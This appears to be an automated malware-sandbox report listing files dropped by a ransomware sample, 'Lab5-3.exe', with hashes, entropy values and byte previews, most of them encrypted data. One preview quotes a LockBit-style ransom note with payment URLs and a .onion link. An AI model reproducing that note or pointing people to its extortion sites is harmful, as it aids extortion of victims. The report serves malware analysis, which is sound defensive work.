                                                                                                          MD5:B8780A7C9F08AD1FEEC190C42AE445A6
                                                                                                          SHA1:112D7E2EE4442FCAD7C9B3EB5A96B216AA17A6AD
                                                                                                          SHA-256:A839DF348B2B48084C6F84542C9CBF5C31DCB3261F121861B95E4057E6BC3B01
                                                                                                          SHA-512:BC5B926C6BB8CBB3395A827A489DAD6A68B97A0A689D7903F98F89F97F6CAB3C1BA62362639373939368C50E0C0BA9FBB2BD9DD73B10EC868F357BB8EB951E10
                                                                                                          Malicious:false
                                                                                                          Preview:Ayi..Q.r.u..F.P+.W......BE[&.7-P...6....S....n....z..t.6..U.Ob.F...yG.J.Y.P....*.vR..&y.... .R.I.;..-.p.i.......:.f..{t.e.'..6g.i....)..q~....b.....0G...=.&.s.LS.J..."*..%..C....v?."..-N.....?.(`.....EF.f#|s.j._..@.G..4.Y..9L.l.X.i....@.|.~&.)..G.|Y...@.KV.....<T.h...?....G..e.h....b...dK..9.m.f.....5D.ea..n.l.....Ea..Ev8.g.u.v.X._..S.A>.:X.....~..]..._..Jm.^..=z..o9....^.]'..i....~E....e....2.:.y...5F..`.......|y.....E......<........).h]...4.]O.a.Mr...M....}8..[...fY.....T|"..w.?.=ss3N..!.5.].......6...Ms.....G.0.<...}.$.F5..Z..........kd.G...uz..r.].`.y.Un..M...r....._<.k.I..>+...WK..z.~..}...I..[5........8$.8.'..~.&v.2..es..pH..s..m._kfQ.u..T...44....;.$i.....n.o%.Qn.Q.N...06....D..:.Z.j..t.3i.|..*?'........8..*.......D%...'....B.xJ.J..iEv u..'......}.:d.%.....\z....@..s.@(.#y..Ww.<......v........IJ..........,.x.O... ;..v..I..g.;.~=...r&.......>..n2..Q...F8.ncC..........i...EV.....&.7.({.g..qS.[.5.....rm.*.]..u^.W......F.@L.R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4608
                                                                                                          Entropy (8bit):7.952586998125955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:qTw4Z9Iluft6p0OBRMbfDHpD9p1Nu+AfhjUkGx0uKeY2ElUJ:qTF9IcyBuPJD/1l/0Cb
                                                                                                          MD5:E686CE73751D85B6F06138720C49C386
                                                                                                          SHA1:04FF492E428C6A8FDF87708BD25451541391BA06
                                                                                                          SHA-256:5712B16786F75CB0F1E4E6F34E4F8B727001E78DED6EEAD89D8BBF1A851F9C6A
                                                                                                          SHA-512:C046ED6E2F77DE583DC4D8C908CAD67BC83CED2D87C0878A4F1D0D9B76BC0A00E36147321C8BC03F9E54398245FABB0536596FFF87EDCEE4BB295518BABE8F77
                                                                                                          Malicious:false
                                                                                                          Preview:..RS.......K.jI.....U..W.,.(.;ZF...%Q...........h..LA..s....C=(h^-y%.i..*..&..4.^.i.7.y@.,,V..........@z.....a..2.\.l|....m....[N.>..s....2.h.....U=]-.Bvi....T..=.w).dd.....X..._k.....v..hp/j.(.'.......>i....C@4.\T........n.[8........].....c..._.....)S....2...DQ`k8....Hw.Z=......E.S..Y.Kh..#H.2.7?]....h.#10KT.ss._.-..F.nn..gm}..g..q.....R..u.-Ct.........T.H.Hu|.c.1-W.....h....e...g`.v."..j..~..{.u.....i..yj.>:...y!...8@...%/.BA.`.I..a.N..% .....C._..g.....c...1..%...@V.m.V..} F-..+...W..f..B...7<..f.....~.+j...q..wZ.o".n........S.z....l.8.$-#.%W....I..F..I.G.G.v.Pk.......=}....w..s...Q..H...5E..:.p.8.AbD....2al...4...q.ZLf,......;_....../...4..]..LP.3......|..?..0...........Gm..z....-....j....`.4>...P.!.D&.2...L(#....j...i.;..$W..WJZ.L.ibK...;.n..F...Rg.......=:U[.%......A.).......g.....8./...O..7.K..,.T...`.......e{9$j...9~]..zX0......}a....w.....(...4.~y.aOe...O.. ..=.....t.5.>`M8OZ.....v..C......{h..H9MbE....8..U.Z.f.%na..7.T.Mq
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14608
                                                                                                          Entropy (8bit):7.98707466326386
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:sUIm40YkciYi2x+PXRBJMzJGo+cpTlJd64tb:sliaIPRBJQJGCJJd64Z
                                                                                                          MD5:D5C7AF23DB6BE2AEDC47EDFAB3C93B22
                                                                                                          SHA1:1206D5F6D5AED2F32F65BA860587B4AF37BDB832
                                                                                                          SHA-256:198C34996F231BCA31EC24C0AB64B7809C152ED2E752BA70E47E215C79D39EC9
                                                                                                          SHA-512:4724DE7E9FEBCAE2226ADB7059B016CC0A2A39FC019512F50046F1F8C516D0659DB579668CDF3989C605F1AAE479DC320DFFECBC8591A7B0E538D94E85CFB930
                                                                                                          Malicious:false
                                                                                                          Preview:f..l.d..gB.>.ka=8..T......?=..Rq2....*K,.".O5.fHYa...S...\.Bq...g..{M...u$#..AkC(*f.t...d.R..>D.0.A../.i.<.~ .}....f...#b....T.."bQ.[).A.^.I....}.....I5&..._n. .......[....#f`.\.}.rCjaDW.=.#.. .."^...o].J5=6yTA...-;..>...........7..v.4.............H.%,V...uq.!..w4+.lUH.u.F.6....=}TC.{......: ....:.....:p..|1SF..l.....(R`r.M..W..b.p%.6+r..w../i.Z>....T....>}...N....2.1........ke...5...|)..Gb..*.)...I..T_.DrL.......x\..._.g.CP6...2o.....41..<;.L.T...{.8,;..-$o$..C..ad.....&]Gi.P..^..#|k.>..l..p~G".'....l`..2e.}......M...%&...}....}`.K....2.z..h..8.YU...<{.&...,.........(.b..6...RcQ..M.._ykd....a|.......|L{.H.I.U.....o..]...u..<n.....Ri\........u...8.oU.+...A?,..r...8kQ.p.I...N`E..B...#;.*.S..A..yR.X..z.)K..,....g.......S.....+>.e.U..J...pl....XR../.;.#....s.bZ..)...... .O.......f{...mY..*d/..N..2#....pN....}...kOj...3....uV..-c.!.l.... ....rf.V.3^c......CR3.0;/4.n.....*...^....n....}X.r..c.q...]z..........!..j6.p....^.AY..c>Ae..D9j..m6..B%.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18352
                                                                                                          Entropy (8bit):7.990441122773401
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:Mg+QNklyaxWD7crKHZqZpoB4ogWZSz5HCcwTsitb:wQl7yizrBTsiZ
                                                                                                          MD5:AD3FBDAB1E310EAB009335226E13B70B
                                                                                                          SHA1:C3D099B35C996CA6E3EB1992BEAD8E91C6F81E89
                                                                                                          SHA-256:A16B8FC91C28E00F9CEA569DBF3BC26367DBB218AF9310C9471E54C08FC9F4AA
                                                                                                          SHA-512:ACB7E2AC2D1A9EE4EC59FC26C73384E509A49A1DED4CD730D90150DB3B5CC198819EA9C9677BA345C9912E7DBFBD794BC0F0E1E912039F68A1FF3C7BDC4DDD43
                                                                                                          Malicious:true
                                                                                                          Preview:/$.......j.).B&..&...!.s.b....CX...b.*..i...J.eE...v....jH...kRN.~n..@.sf.c....7/...rZ..Q^.z.^..).......j1't....`..Yb..pG......4...J..$K.e|...:..*.~.V|r.O{$....#m..k...[...:....~e...B....j...@..f..E......%.>r.N.. ..Q.t..e[...`I.wx..9t.g.....[....L..iD.. .4s..js..t..=.\p.. UqP8.......)..d......w.xM..{.d...V.xN.......K[...hC{t.!w.NcC....K]..w......H...#..y.H..4.....1/.m...2...8...........V...~P4""...Vty...i..@.SP.....,n....PF..rO....1........(.S.&sa....!.....{..>.9K.SUl..e./......c....&I.c..Lx.<.b...n.._...nz..tE...nsh.[gq..~.d...da...R...I...Y.na.....h.....h.j.U..kW..M....Tb4.Y.!@...q...S..I.^o../.<....kR.h....n..4...sJ...*...^..h.j..p...l..H.^..3.\>3.A5l.I...=.,..G...O..r..).....b...?#$..y$.V...3.yK..c........3.?E..o.*.<.$..dj..v....o..<..@....W.af..,..=.;U.<b..A...D..L\.Q...q.i../..v...t../..u%...q..p.................o.;..........9.......A..5.....7 ~..].M...../..F5..Mb..V...M7r.hO..E.AkS%/..T..f..Wmn..V..9.o0..Mw-.....T...M+.v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7520
                                                                                                          Entropy (8bit):7.973471064491921
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:RMG2k4z6CwKK9TjgX9Z7RgxuepYmLj00Cb:CGYkmXbuuEj0tb
                                                                                                          MD5:69285C66DE7C44F14326C065CC1FA0E0
                                                                                                          SHA1:FF023AE288C4FAE85C85F18AD3F7B40048C003C3
                                                                                                          SHA-256:4915EB28C1F2F017CC74C4CE2C282C4E2F00E33E085026EA53803BAD01F66A32
                                                                                                          SHA-512:7BC080DDEEB4458BB578792D24DFA51E456BA759B9386140E655975073BB81D3DB7F1D559C3039E4502D53E4EC7309A7285C6B255C0AB1FD438D17BC0874E09A
                                                                                                          Malicious:false
                                                                                                          Preview:i....X..iQ._.{n.8...\...k..E...&.>....D.M."...f...}.a.....l.........5`.5P.....Fx...w:...$.8.p ..l.LM...n...0...t...#.n0....G...#.D.ho.-S]...h.j.;.h9...><.E......7.D..I..x......#.L:h.S..ZH...J..ch9..K.t....R^s7....d..;.^.o..n./.....l..;|..B.f...K}3.,...A...S.2....#....6W.;........v..}..+...X....L)..i...=.By...RmD........6_..s.?.....6.f.a-*f....!.}..^@9...D6.........yj8.hGp....../.3o..'<y.......q.J...g6|....-.g..........<...Q.8...v.A..L.}..W..S.9..".V3Z.~.^..S.L.`...).......X6,..0...xi..K..DA. nM%..J.o...r}..]...."...}f. L...*;..~.IT..*@a:..j..d@. s.m.6..p....$y.z..G....j..........'....@Wa...e..A...S.+."<g5`m......I..o........^S..=.7.]8....-.rxo~.&......J...q.v..<....`o..wj..\.9.f...*...z2....A..{..c].`......b..%.Z.9.r..c....>/.....y....N....%.9~.....nP.a,[.M.(.@....R.0......\"..J'.J...&.cX..(.<..bJ.nT3.bO.k...D.7...Occ[m.`n.....d.u......T..|....l.......~K...P\.....O../2........b;..KLW...%.i5...Y.;#.2..+"..t.....4|...x.....H.K..a...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:C64 PCLink Image
                                                                                                          Category:dropped
                                                                                                          Size (bytes):29536
                                                                                                          Entropy (8bit):7.993830041783212
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:RmCNddhjatkeFy/p4n7OYchvog7LPJc/J0Y4lPxbtn+CJoR6TjqCYIm/y7m4fyTI:AwdhOzeKn7ONmhOlVEv6RY/ya4f8NBEZ
                                                                                                          MD5:2E0164B9DA0D8A7D157319487B4E72D0
                                                                                                          SHA1:E5C4308B00FFA77128F58AD654A1E906CDD0FE94
                                                                                                          SHA-256:B979F00EF1AF10D9AD449D3457E32CA09DAB263C2E0D0EF9850B92B4F047C525
                                                                                                          SHA-512:AD10570DE9F1B30AB7DE7F4F452E50F14A498C4B050697DA03A38ADC43A2C94F1E082EE5638825F947DCCEE8A25CFAD641D5F3C392565434643E7F5BE10981F9
                                                                                                          Malicious:true
                                                                                                          Preview:8....U.{...x-.I.xX.yz.[.w..............l..x._.."....:...P.F...<$.g.,Z.1...W..X........)*1..ys)N......V........@..?0..X...y8M..n.M..9...8.2.s.....#c.y@.w..&*...8..V.w.j5]..c...&T.ZHM.......t ...)...z.o.'I.+0.Q.!%yI..x..2..KRy..L......g[cV.?9.!......2.E.....7!.......^..1....M..P..l`..i)..R..!J_P..7b.Ru.2o.....R..........-LJ-.....q.M....79....a.N.D<.L.!.~..".2.(:.....g.L.SW..U.<..o..R~..%..."~X.M.>#.M...~b.qF.MQL*.....$@(...A5..G.....GkfK_...f.!4R.I....,."~..k...ab].]-.AA..s....n.J.i..m.&.D.D{..=c;h...#EDN5{.H{w/..2.,.T..R....w.|...j.go7c.......X..].,m....;.......S+....B..d`.(.@.6......[...h..G....x..@.<c.....n..c.[...R.\...)x%.d....sc.%.eQ..f.L.j.r.."rU..y.......N.K...H.d}...V.H.1...r.h.\.:...k.kF;k.C..ic....|....0.h`....]M..X\.,k..k......_.-...r.!@..-.,j....=b.../6..g<z..4...lu..%u.p...:&.A...........c.m@dQ.0......f..(p.....0.....o..0agr{..././p."M.n....w*.Va_.e..N....5.)i{.....e....W..;V...RH.`..t.ktLY..../...L...8z.......S+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):29264
                                                                                                          Entropy (8bit):7.992353687951729
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:/JVM0GFRVMJkqNcNiyTGFpW4aDQMSRTcoZ:/jnGFNqNcNiyepIQMSxrZ
                                                                                                          MD5:D19EBB66A2C9DF6D40091EFC50973D4F
                                                                                                          SHA1:D2F728FBD7ACA8166D3A9B772C69608BA9AC9CEC
                                                                                                          SHA-256:61368EE7D17C9F5ECC6FA08F164468A491CE4C59467B36B9C64692DB2B373018
                                                                                                          SHA-512:26D14B1159AF09AD121E58059729E2403DC3B724B00BB0F0A88F6079E61BD2290E6E1EF7238ED3706FFE5C2C5E09F7CFAF107728FA209487E299BCA5A7263259
                                                                                                          Malicious:true
                                                                                                          Preview:..it%..w1.......T..{...{/f.......f...O.a..I.^})Jr..[Z..Z.uAr....Z.......'...7.H{.%[...&.."..d.N.......R......K...../8c..c[V.......lutZ..... .[.p.c.h.l...,.Lgo.}S...|.df......0.|...Q.n.).......:.:........._......h\>.....}.<.q.R.D.+.J.%...(...._.#.._v.?....vQ....Z.).?...2.p..`d..._$-\?.,..1..t...i.%?.o..b..6..O..B..g.....M...*...aZ...>.......K..>.7[...(..-."Vn.ONePP..{.......k.\cM........-...ja.R.1.......8X`CI..r....)...E..<...J2.1.mU..f$@QH./..7.Z..o.4I..,.G..N.b.......vGz.:..&e.0q...z3...8.C....'...k..^z|?b..4IG...'..l.q..;...S..N&.."......r4.......k.8...... .7...!..>.^.aZ.....%...F.z.<...#T..7...]........a...K...-!y...5...9..6.....\..T) ..0sb1.H..vYJ..L.....HG..%.1f.MY_.+....y."yC..M.\y..Ny*`.8 RL.x1s.P.fb......t...|....wg.|..NY~h....D..{4J.......Qj.....c=...#~......H$r.}..x.C.}.<..^.....+}x...aR<...G.%..g..$$..[..1.n.%./.WW.(...f..{..........zV_Z..".......E.....?.$..90=.'HI<...D...?......p...;.e..o)...E...|...P.:...+)5..[....S|..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13728
                                                                                                          Entropy (8bit):7.987140871588537
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:vto8ltKm3PO6HlP/dMu+UmHHoT/veJ8udMAG89ztb:vOMAoHlP/dMamHIT/vA8izZ
                                                                                                          MD5:A2A736092D0A2D6534D438F681A4283A
                                                                                                          SHA1:4BA5FEE04E9E37F111BDBBD603AE3BCEE44595A6
                                                                                                          SHA-256:BA38D89BE7E2FED3831211EF5AB5876575289BE449EDC6C389379FFA7E67979B
                                                                                                          SHA-512:92170EFB2D213524A63436388DA45CFA713B373129B2A00C85AF7EF49DC7292203E698FE0337878E5AD9A6AF52102CF7EDB2A4EE7240F42CD657D4DFD28B28FC
                                                                                                          Malicious:false
                                                                                                          Preview:..V<C.a..5..8........d*...3.$.R./.P..`.Y..tcHVy..].)U.G._.....J.7...$.).&....C.W_.#b..t....Q...2........x...1...JT.......p..~.>t.}....!..,..,e.F.9....e..I..Jn......6J.wC....zy..Bt.u..%i3.........c......<.b.._...^..]...X8]#..e......v v.<..S...BHY\.4W..=....|....`.. ..|.....(........IG.C.>.....z............G.....H..PN.9F;[...Q..R.V..'v..P.O.!.*...1{..x@F..=...0n..}..ko......PQ..Y....*F.i.1..qT....:.....&.....j...F.{....H..$......XH.46.X...fM..Tx..k-.H.j/....B....Y..)F.J...[...A........O..C.j4..V..W..l..s..39.j>.l...OJ....P.R?....j4>.D....T...=*A........qJ4..l..x.`L;.g...b..Y.%....P.g....%.......oA..!KF.x5.....:.F...V}.Xf.6.o.y.........d.!M.k{.6..s..o..A.| ....7a$j....9W.}E.U6{....i..~X...C..H.U\...U..f.....:c.&..3..|..(.z..P..5...O..Q<..<.=.T.q..&....L.&..mC.Z.. 8...wY.E&...c.^;....VW.D.iE.W.J.P...n...g..t..|H...M......i<H..{P..i....+......m....s02..[T...............q.td...>4-E..V$QZ.x.J.6xj.X2&l2.i.y.LC$.2..(6..U.X....M`..R=..T
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5392
                                                                                                          Entropy (8bit):7.969803447650732
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:YnUgxDq9rDHj696adTTPyjfbSCCbPmKeothcGx0uKeY2ElUJ:YUwDKrX696adfobSFqIthv0Cb
                                                                                                          MD5:20F501592D6AF91C238B6D230170D193
                                                                                                          SHA1:B5C57984C99CE5A9047B733B9758378846A53F73
                                                                                                          SHA-256:8B6B5611CE07A42D49EB3DCF15B8607020B2B23C55BDC8783DF38DE35ADBCE2E
                                                                                                          SHA-512:E68BAB53F21A8C866E0FF4B1FD92904B8BBB8AE0BE6CA136FD137DCB4CBB1584AF89E412FF189F89E09148650BA372A9642A9A840DC6D163DA1248F53F2D0F5C
                                                                                                          Malicious:false
                                                                                                          Preview:MB'.L..]..+..k.8.....W.Q.I.Sb.....FW`&n..\....N....5.].......j...K..]f.Pg>c.4?6Lj[.........VbA.VQ...r...s.-.''.$.Gp~....})...4..XN.....>B|..$.&.-;..,..,.>/....R^c:z..a..%.~S...PS.g..q..97c.3....hh......K..`...,:'..R.C......U...P.1....[.R.~..y.(.xk.....>#..{.a.4....D......s1..jVl.....e]........$^.\..j.=.h.Zr...B...aW..2.........Z..'.+O..8..C..h.i.>.G..2p7.....UW..vS... k.:.......+".x.h..?.:..R..IY.V........d.....>..$. ..)4F=.6..5...F.....)..gU..Q......_..y.`F....d....:*`.....^...)?]@Y..i!..K..h!....a.[.%...2.....:.s.....5@......".......H..[.bC...N..6.^.O..!.a.......O|e..K?A!d.......Y.q.5..=.B......?[...*.o$t;0.*C..x....z.vI|r.).%...,{ji.\....~.......J05....|.L...b......~].3L..2o.o.^.6:?%_....q=F.V"..#:..y-6...2pP.x.....Zj^..S?..D...yMG....):.4...?...m.....M...8e$....\X^.k....+....L..w...<5...I.m/.k.Z...;o...k`..eB....bx.U.mjTnL/*'Ge....#..+.8/:...o..&.dK...)....s.e....2...)o...S .%......!..........s.hQ.........!...eD.t......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15024
                                                                                                          Entropy (8bit):7.989064684411205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6AmaLvHl9qKe1wHrY9hy085yoxETUK0xF/gI4bhyNNAifuAvEN3qQIBJihAapSDX:6AmWvHw39olNIOF/DGyHGAvE8QfSDdtb
                                                                                                          MD5:5F6115C53B15B54F3E95F519E914246A
                                                                                                          SHA1:0895E0E3431C18A12AB160240721D36F7E5AD88A
                                                                                                          SHA-256:DA8B9828D795EDB5A8618F179E1FBB85FB0E4D04167169A18151E83CF9D917A7
                                                                                                          SHA-512:953393CABABBFAAD822D86992C454ED2525BA620B4C8F029B489E29EE71ECD06DE6C83EE36D874CBC30B8E75B739406F17FA2BDD79CC229EC79B99277E4B8C96
                                                                                                          Malicious:false
                                                                                                          Preview:./f~.......!.+; 1....FL.....$...Z.aT55K....[.2)...-.@.N>..D.g4A......6..+F.N..H.&...EIZ('......A....h.x,f+@...9O..Q......g..h..S.v...q..L..a.G..V....[..{.........^.nE.{+...c....n\....%y...h$=..MQ.....[.p....S.NQ..le..q9..........PgF......6X].P...i[...P._`......c.RC. ..&a...=.'....j.g.E.v...ab)U..p..F6......[..".....I.A4..W......2r,......L^2.G...L=..Y.b...>.4(.D.U....<X..wq^:8R...7...:..8t.x.B.V.b..s.]+.C.w.O.K..........c.j>.Y0.[.....X.....v!0bFq.Lx..1.u.*6*..9..h.e....c.E.v.b&&.LA...M........g..0_;.K.}.5...7..3!.........]....+....K[...E....4.......J.4.*...as...w.qQ`.I....C....o.B..Ta......j....n...$.W.$..dis....m.A..[%6.......&.*.!.....k1.c...we.h.6Y.%.u....D...T....W.....+..\cTq5U^+n.au..;......+..J...:.....5...l.j['..&"@..!^.S........!.W....x..;e"..M.'.T...3.S...\.....p....B....~l....y.....g.x.).....i..[S.;.\{.K..+........E..$e.X...[.U...*J.&W..n...+^|.}......E`....TR.c...........c.K....6.*....:.:;>...i...}~u......@c,G..'Fc
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3648
                                                                                                          Entropy (8bit):7.952093046060045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:5Cuv+Szz0vamrtgwgPQUX+ryS9+jGx0uKeY2ElUJ:pvXHIW5PQjWg0Cb
                                                                                                          MD5:CAEF4985ACAB8E73F226FF257701EEA6
                                                                                                          SHA1:5F08C89DF226C970C57AC7240024E4A1A6E66CF6
                                                                                                          SHA-256:5313F5C3B98D56064F6983E3876315DCDF7A8E3DDFB4FAFED8378DE7A73B35AF
                                                                                                          SHA-512:672FA5923CB6FD6F354A9B9085FABA26EEFB9BA4E2755402930C61F739ED1EAADD7AAB455C165A467ED24BFD05099283B50E9B7B0FF5BB429C088277085C9523
                                                                                                          Malicious:false
                                                                                                          Preview:...LB...j.0..]w.+~....T.<X"..Y..H..^<..T.D.O.....g.Y$.g...F..R.E(WD*.% ..q.-Px......Y.....2A.y.J.tn........< ....~..HK."&L..G..I.........*m.....d1.$).n.8..{w.K..&.!..C...R,.E....-...A]......n.....E..R'.{...1..."'.H.lk..}&....m3B@k....".6@-mR.:a..R!..T...t... .j1..t=..N.&#....O....B...rrQ.A+.`.a..9.#.....<....b;0?.....i(C.K...z...I...........c;.g.R.6..1....c.?K.......N.i......2u....;.hU.5....a_%\'.......g=...y.b.G.4..}..(}X.@..v.i.oA.bj....m..t.Y+..[o..#uC.=..{]_.<.+.,...R^.'....!.3.C~....Q.B..@.4d....n..M4...U.......k.g..Z4.]_E..4....J".5.v...:...".../eQ...R]r1.+!V!..D.P..W3..B...+k........O.>...........c4..].$...No...f#SF.^.;.I..E.......C.}..V.=.....&Q.;:.@.{+v.....Jv..RI..s. .....haM..|...,2n/......TA..).....MM....._...LL.cKi8....P'z...;.AG.0?...r.nL.0g........j.........F..W..!. 4_..7i....."..p......2.`....A.0....7...b...&..l.W.?...}.@.!...Qd.d..%.......x'.L.?a....!z.T...4...m....."1..<....L..........7.F....y.[FDa.'..L.........vO...R......]b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.938430182370434
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hk6FQPp9K/8gWANB2zmtYnhVcx76KWGx0uKeY2ElUJ:hz2Td2BRuVYz10Cb
                                                                                                          MD5:E624D4115309298A9502C74F312F8667
                                                                                                          SHA1:7CCCA92DBFF977D30C4B19FCB52453B70C7332D3
                                                                                                          SHA-256:2CB5590CE25190CB2DBF9F18FA26531C6DDDEDDD5705C28B5EF22ABF1118B933
                                                                                                          SHA-512:D0F202A5856347AE1F9E3BA6E2EFA5B44C7421E60E9628EA955326AA7D6BE0C0168644542BBF39666BD8D8021F3E92C1A5800057C32B01E9FA28E030AD965FB9
                                                                                                          Malicious:false
                                                                                                          Preview:......c....H..R.........#...e.E;..Vh....O{.y\y...v.2zz.M[...@.x.6...uLz........xx..+c/.?..0..<.........G.u.....'.....}..{......w.{.}..O8H....9.r.,t........XW....t.e.?.V.+.l..M...3....M..{&.C.X........PRX.X.....I.$..x.f-..]LX..J...1.0...uQ..FN...*./.p.A(t|.Y5.[.S..+?~yPI.Yt...u....V.|.-..0q.F.%....c.@.l5sq...a.J.hj..x.......n8*nJ2.u.r..l...V7.wSB....t..aP...PY.@.'...:.%.W.\y*......X.....O......{...#.C.@....-B.T./..g..-=0...a/H..s...._....M#...........EM.Ap...i...qI.'..Ja.^g.'......&2}W..+~..J.......k.........x].`U$.P.Np...t...x.^g....c.;I@..Vhj. e.-...r:.Kbek.3.u..*S.{=T._Fj].Qr..a...P.W.0kbL9.O..zP...1...h.Z.n.:s.m.3.o...=.@<C?.(l7...Yf..>...@m......^.%.7SE>.$.]......K.x6.b...N...Xyp...D4ZO....~..Y........g..6d..l..H...!..!..5mCs+.e...6e&.QR\.d:....%2..aso.{.>x...<l.BR.E...4W@.[,F&......6..Q.m.jj.EL...X....^D...y.-....\.7I..[...u.?......q[........l3...F..Lk...&.dy..t.7...j...'......L.l..G....H..CM`<....<..VI.$.<.J.'......Y.MW./I...E.$..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2608
                                                                                                          Entropy (8bit):7.932920578156345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6KhI3xD4cyCyHaFlzgQzvph+PImDHfUTid3hBaUoSGFcmeykEdEElU92i:FUCAdhWPIzGx0uKeY2ElUJ
                                                                                                          MD5:F5B20DBBED38CDC27BC812BCE0182915
                                                                                                          SHA1:2399496A126D478E0DC48B04B632C8DB1E217CDA
                                                                                                          SHA-256:37A29FF43163F01FF4985BC88932DA17462FE3C813B91A7669ADDC8A5A9791DE
                                                                                                          SHA-512:4A2AD609FCC7DAA2111AFE6653F456C83CA6F32FF6F95AF09E713B7E7E352C68A0F2D1B0D18C32F6C190633FD06FB240429DB46E3B25B537319DB11D2FCC983E
                                                                                                          Malicious:false
                                                                                                          Preview:.:4S0h.8..c..R..^.._e.W..-O,q.....I.!".QE.....8.d.D..WK+.}.7&j#.y......Y..V...R*..)..91..'........N(.Cl\.|.].....J..m.:..T..3..R._..tt.C.ww&o...=~S.....?r.....w.Z..)m.e3.@...%.r:m.}O.S.2..}...t..?..!8ST...x..S|p.p.hY.....G..U....5..z\.;_.sZ.M..Q4..m.E.x>..sYB..DVy4.+(i..`.9...H.HSm...........S...(..(..!.H...O..}..*.ye..v.w...6.a.&.J..(.......c.../. ,....<-G..b......x...(..........m.........L..[.s8.j;.(:.c......[4..r].0....G....}....U.[..2.].&...!......d.....c.^..|IR..H.B...j..u...Ek...<n..)..Nw...n.m.L.9IL.._....xbO........'."..%.2....zf....^B...MI...d..Y..q..I.o.#"\.t4.<.....Zm....Jx.....B.L...Z[....N..........s...b..r...(59.'.k...[5.K...._.Ll.c`.#.M..&x.O....."p.P9.t..3..)ta.to. .a......h....V.!...'mV.Gq].......K+.L..Bp.I..,K.z.\.4..f.(h._?On8.r#........$.t.u.........$.M>W......{T,\@.f...7~....$....z...aQX.D..v...'*..*.#m.#..K...R........D.F....(Z....3.U...).X...[.6g.2.y....,..+...<..t'O:..UP......H8...G......N..w`$...........a.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2608
                                                                                                          Entropy (8bit):7.918007009201933
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:frVDWLrTS5Q6QvMN0BbCarEVHfUTid3hBaUoSGFcmeykEdEElU92i:J6TGH6EuGx0uKeY2ElUJ
                                                                                                          MD5:8251A3783D7082816FD67F71F4B5E0AA
                                                                                                          SHA1:E9410C33EF28AFBE1453E52158BD0E7025285252
                                                                                                          SHA-256:0773FEA43EA91A261B674346C1A8BD551DDA3DDB271E75F63FEADD5D575CF7ED
